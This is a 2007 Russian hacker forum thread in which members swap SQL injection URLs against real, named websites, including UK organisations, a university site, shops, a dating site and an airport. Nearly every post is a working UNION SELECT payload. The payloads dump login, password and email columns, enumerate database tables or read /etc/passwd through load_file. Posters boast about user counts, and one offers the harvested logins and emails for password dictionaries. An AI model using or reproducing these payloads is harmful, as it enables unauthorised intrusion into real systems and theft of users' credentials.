SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Воть :)
     
    1 person likes this.
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    ИМХО сначала использовать order by так как сокращаешь время подбора но не везде работает.

    http://bestposters.ru/main.php?big=-1262+union+select+1,concat(login,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,1/*
    около 20 юзеров, фу бяка даже не интересно :D
     
    #522 }{0TT@БЬ)Ч, 16 Feb 2007
    Last edited: 16 Feb 2007
  3. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    для меня день сегодня не очень удачный в количестве скулей, но очень поучительный в плане ошибок. Сейчас приведу скули, где есть ошибки, с которыми я ранее не сталкивался, и которые так или иначе являются тупиком, или по крайней мере я ничего получить не смог

    Code:
    __http://www.revolution.co.uk/_forum.php?neuron=3+order+by+14/*
    __http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+11/*
    __http://www.immunisation.org.uk/article.php?id=-97'+union+select+1,2,3,4,5,6,7,8/*
    а кто разгадает это головоломку, тому дам +6
    Code:
    __http://www.prospect-magazine.co.uk/article_details.php?id=7320')+union+select+1111,2222,3333,4444,555,666/*

    и только один удачный

    Code:
    __http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user,3,4,5,6,7/*
    
    таблицу не смог подобрать, так пробывал...
    __http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user_name,3,4,5,6,7+from+pw_dyn.user/*
     
  4. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    Thanat0z, читай больше
    Code:
    http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
    http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
    http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
     
    _________________________
    1 person likes this.
  5. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    хе :) в этих кто может и можно вытянуть, а привел я совсем другие :) Но все равно ты крут :)
     
  6. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Thanat0z,c411k,
    Code:
    http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3+from+customers/*
    email=login
    :D
     
    1 person likes this.
  7. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+from+mysql.user/*

    хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?

    датинг сайт 300 юзеров
    _http://www.datenlove.com/pic.php?id=-99+union+select+concat(name,0x3a,password,0x3a,email),2+from+users+limit+300,1/*

    _http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+eftersnack_users/*
    _http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(user,0x3a,pass),4+from+bf_users/*

    но вход в админку только с определённого ип
     
    #527 злюка, 16 Feb 2007
    Last edited: 16 Feb 2007
    1 person likes this.
  8. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    злюка перебирай
    http://www.bushtorrent.com/pic.php?id=-99+union+select+1,concat(username,char(58),passwd),3,4,5,6+from+users+limit+1,1/*


    мои любимые часики http://www.orient-time.ru/trade/news.php?nid=-25+union+select+1,2,database(),user(),version()/* ;)
     
    #528 }{0TT@БЬ)Ч, 16 Feb 2007
    Last edited: 16 Feb 2007
    1 person likes this.
  9. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.nix.ru/news/pnv.html?id=-99+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    
    =\
     
  10. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.nintek.com.au/x/Scripts/nin_support_faq.asp?cate=-1+UNION+ALL+SELECT+1,table_name+from+information_schema.tables--
     
    1 person likes this.
  11. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    __http://www.franinfo.co.uk/exhi_detail.php?id=-18'+union+select+1,user(),3,4,5,6,7,8,9/*&exhibitionId=54
    __http://www.teachers.org.uk/topichome.php?id=-143'+union+select+1,convert(version()+using+latin1),333,444,555,6,7,8,9/*
     
  12. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.rosmarket.ru/index.php?r_id=-1+union+select+user()/*

    http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1+union+select+1,database(),version(),user(),5,6,7/*

    ППЦ http://vrn.kips.ru/
     
    #532 *D1VER, 17 Feb 2007
    Last edited: 17 Feb 2007
  13. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://ccrc.tc.columbia.edu/Publication.asp?UID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ContentItem','ContentItem_Person','Archive','Archive_Pass','ArchiveColumn','ArchiveColumn_ValidationScheme',%20'Area','Category','Category_Client','Category_Record','CCRCRole','Client_Category','Conference','ContentGroup','ContentItem_ContentItemDesc','ContentItemDesc','ContentItemType','cw_Client','cw_Client_Card','cw_client_newsletter','cw_client_newsletter_old','cw_Client_Pass','cw_Client_RecordPass','cw_CreditTrans','cw_NewslettersSent','cw_Pass','cw_RecordRelate','cw_Session','DiscussionPost','DiscussionTopic','DiscussionTopic_Record','dtproperties','EditionList','Event','Fact','Import','Link','Main','NB_Commander_Tmp',%20'NewsletterFormat','OrgType','Person','PluginRecord','Presentation','Presentation_Conference','Presentation_ContentItem','Presentation_Person','Record_Pass','RecordSecurity','ResearchProject',%20'ResearchProject_Person','Search','Seminar','Seminar_ContentItem','Seminar_Person','sysconstraints','syssegments','ValidationScheme'))--
     
    3 people like this.
  14. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.caduser.ru/acad/index.php?ver_id=-1+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*
     
    1 person likes this.
  15. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    _http://www.latek.com.ua/index.php?page=produkt.php&subcat=-51+UNION+SELECT+1,2,3,pas,5,log,7,8+from+user/*
     
    1 person likes this.
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    5.0.21-max =\
     
    1 person likes this.
  17. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Пройдемся по форумам

    Если там ограничение по юзерам не задовать, то ошибку выдает

    В среднем, на каждом сайте 1500 юзеров. :)
     
    2 people like this.
  18. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    Cologne Bonn Airport

    _http://www.cgn.de/main.php?lang=2&id=45+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,database(),8,9,0,1,2,3,user(),5,6,7/*
     
    1 person likes this.
  19. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    __http://www.ihrc.org.uk/show.php?id=-1657+union+select+1,2,user(),database(),version(),6,7,8,9,10,11,12,13/*
    с этих не смог ничего вывести

    Code:
    __http://www.fairelections.us/article.php?id=-67+union+select+1,2,3,4,5/*
    __http://www.elkhart.k12.in.us/content.php?id=157+union+select+1,2,3,4,555/*
     
    #539 Thanat0z, 19 Feb 2007
    Last edited: 19 Feb 2007
    1 person likes this.
  20. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    ЗЫ после вырежу мыльники и логины для словарей, кому надо, то пишите в личку
     
    #540 Thanat0z, 19 Feb 2007
    Last edited: 19 Feb 2007
    3 people like this.
Thread Status:
Not open for further replies.